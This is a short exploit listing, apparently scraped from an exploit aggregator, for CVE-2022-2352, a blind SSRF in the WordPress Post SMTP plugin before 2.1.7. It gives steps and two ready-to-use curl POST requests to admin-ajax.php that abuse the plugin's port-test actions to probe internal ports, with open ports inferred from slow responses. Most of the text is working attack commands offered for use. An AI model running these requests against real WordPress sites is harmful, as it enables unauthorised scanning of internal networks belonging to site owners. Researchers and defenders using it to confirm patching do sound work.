Exploit for Post SMTP < 2.1.7 - Admin+ Blind SSRF CVE-2022-2352

Name: Exploit for Post SMTP < 2.1.7 - Admin+ Blind SSRF CVE-2022-2352
Rating: 5 (294 reviews)

2022-09-05 | CVSS 1.2

## https://sploitus.com/exploit?id=WPEX-ID:DC99AC40-646A-4F8E-B2B9-DC55D6D4C55C
# Navigate to https://example.com/wp-admin/admin.php?page=postman%2Fport_test

# Inside "Outgoing Mail Server Hostname" parameter fill the target host and port number

localhost:44

# If it takes too much time to return the results, this means that the port is open

--- curl requests ---

curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php?_fs_blog_admin=true' -X POST -H 'Cookie: WP COOKIES' --data 'action=postman_test_smtps&hostname=localhost%3A44&port=465&security=6b297e1647'
curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php?_fs_blog_admin=true' -X POST -H 'Cookie: WP COOKIES' --data 'action=postman_test_port&hostname=localhost%3A1338&port=25&security=6b297e1647'